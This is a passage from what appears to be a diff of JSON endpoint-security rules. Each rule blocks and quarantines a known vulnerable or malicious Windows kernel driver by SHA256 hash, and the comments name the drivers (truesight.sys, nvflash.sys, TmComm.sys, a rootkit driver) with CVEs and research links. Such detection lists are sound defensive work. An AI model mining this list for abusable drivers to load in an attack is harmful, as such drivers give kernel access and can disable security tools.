+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5640179b9cffc3517d322ac2c0bc1258b563f65ebb1b67eb22ecf7f3a0500c7d",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7de1a559-ffe7-542b-a95f-d7ecc61b53f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474993Z",
+ "creation_date": "2026-03-23T11:45:31.474997Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475008Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3322c0acfc5059a56a43d3ba4aec5e50fd33e4cbecde61886870d35ca713770",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7de728fc-c055-52c3-a077-08a6352d0235",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494583Z",
+ "creation_date": "2026-03-23T11:45:31.494585Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494590Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "936cd8d5a9631f699f6ea47aee9bb2830f8e5d344a5cbc9a5406849f8c76590b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ded9750-04c4-5131-a855-6e5f266b5654",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619072Z",
+ "creation_date": "2026-03-23T11:45:29.619074Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619079Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d510b3424178f80cbe926217d74bbecbf682a88f1b6052ef27fd27d601fc14f7",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7df869e0-2205-5e7c-ad6c-234f90b32ac3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452569Z",
+ "creation_date": "2026-03-23T11:45:30.452572Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452580Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8922be14c657e603179f1dd94dc32de7c99d2268ac92d429c4fdda7396c32e50",
+ "comment": "Malicious Kernel Driver (aka 1fc7aeeff3ab19004d2e53eae8160ab1.sys) [https://www.loldrivers.io/drivers/aaf8ce1a-e11b-4929-96e0-5ec0666cef2c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7df95a3f-034d-5650-87d4-186b63cfa41f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823088Z",
+ "creation_date": "2026-03-23T11:45:31.823090Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823096Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f3bb5f551e507edc3acf10dc6256330d9346ba8507835d4d3c502a14910d36ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e1ae96f-aadd-50c8-a0c3-250ab5d41ee0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498522Z",
+ "creation_date": "2026-03-23T11:45:31.498525Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498534Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "336fa6004c339b5febea9dac960d794a61c34fdcecf4df8674126e3fe7325020",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e1e08a7-fb2b-5dba-a718-41b2ce4314a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607508Z",
+ "creation_date": "2026-03-23T11:45:29.607510Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607515Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13aa698c09a31d642d3e2a9dd03be2363b11b4024689fb6c97234719446dbbd7",
+ "comment": "Vulnerable Kernel Driver (aka PanIOx64.sys) [https://www.loldrivers.io/drivers/93c84c08-4683-493d-abf7-22dc2d1cb567/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e1f2249-2ebd-523d-90a5-640892468946",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142910Z",
+ "creation_date": "2026-03-23T11:45:31.142912Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142917Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f4cde6f97420602f31c1bc9aa72a57a46c27ebc37dd412f0aed74cc9e0d1e46",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e288d1a-4c39-5197-9455-197035923ecb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616347Z",
+ "creation_date": "2026-03-23T11:45:29.616349Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616354Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65c26276cadda7a36f8977d1d01120edb5c3418be2317d501761092d5f9916c9",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e32d87e-1736-5624-b849-516bc7e81490",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975024Z",
+ "creation_date": "2026-03-23T11:45:29.975026Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975032Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ef0dbc4c4735f30e96e16375b18c2f5fa58e15ef60d17786e39e616a4438e264",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e35bd3e-2d1b-5cb5-8803-2e60722dbbf3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829487Z",
+ "creation_date": "2026-03-23T11:45:31.829489Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829495Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39af2d3c5bd48f671489db694c1dd7be6dc00165ec687f27f53ce95e7cb2fc29",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e3a3cf0-ae6b-5c4c-b790-d1e8fbb8c8ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968040Z",
+ "creation_date": "2026-03-23T11:45:29.968042Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968048Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8fb3d3db095920345cafc55821598b4f46f8d756caf2f18016e331e5567e6a41",
+ "comment": "Projector Rootkit malicious drivers (aka KB_VRX_deviced.sys) [https://twitter.com/struppigel/status/1551503748601729025] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e3bd893-fdf3-519f-ba35-55ad7518ca9f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499001Z",
+ "creation_date": "2026-03-23T11:45:31.499004Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499012Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2600f0baa96e447adb3469e95ddbd8bc103c9ae9ee2ed123007873070fb545c7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e41d856-0158-5e56-be83-8d566d129170",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618339Z",
+ "creation_date": "2026-03-23T11:45:29.618341Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618346Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eef68fdc5df91660410fb9bed005ed08c258c44d66349192faf5bb5f09f5fa90",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e43783f-f0fb-5a31-93ff-9c8be54f89ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471626Z",
+ "creation_date": "2026-03-23T11:45:31.471629Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.471638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe3256ba26e1b2b60ab1e4fd61196a8fc4a341b2eef7ff9582590c27b682f439",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e44ed3d-6027-5b0a-b1d5-b129ff708b72",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816602Z",
+ "creation_date": "2026-03-23T11:45:31.816606Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816614Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8159cd1a161eb79c7e2ae361dbbfa24f4b8a30c64679b4b1618acd2f0225d126",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e452da1-6856-58fd-8d1d-6715c6d74516",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817506Z",
+ "creation_date": "2026-03-23T11:45:30.817508Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817513Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2288c418ddadd5a1db4e58c118d8455b01fd33728664408ce23b9346ae0ca057",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e4ac328-0684-5a4c-a0a6-176ff72bfc5b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821786Z",
+ "creation_date": "2026-03-23T11:45:30.821790Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821798Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "182bbdb9ecd3932e0f0c986b779c2b2b3997a7ca9375caa2ec59b4b08f4e9714",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e597db8-a91a-5341-a859-e143a8ecd618",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811399Z",
+ "creation_date": "2026-03-23T11:45:31.811401Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811407Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1209cbe84d04f0c752cf1dcf4ab861a4563272f939fbd2cbf8b83ac5a2901597",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e62efd7-d2a1-5e88-945a-fff000326685",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810309Z",
+ "creation_date": "2026-03-23T11:45:31.810311Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810316Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e09d1f618b48463045f84d6c5998ef060edfd07ff83fa8d44d136ca01a7dcae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e69fc38-b6ed-5075-aed7-369b17f69fb3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142688Z",
+ "creation_date": "2026-03-23T11:45:32.142690Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142696Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "97ba73eea08c19478189d5c07b48c250a68cd7652517ba8b2633e8c2d1ee2b4c",
+ "comment": "Vulnerable IKARUS anti.virus Driver (aka ntguard.sys and ntguard_x64.sys) [https://www.greyhathacker.net/?p=995, https://www.exploit-db.com/exploits/43139] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e6b3436-7b54-5904-a761-56c3827153f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982695Z",
+ "creation_date": "2026-03-23T11:45:29.982697Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982703Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "727e8ba66a8ff07bdc778eacb463b65f2d7167a6616ca2f259ea32571cacf8af",
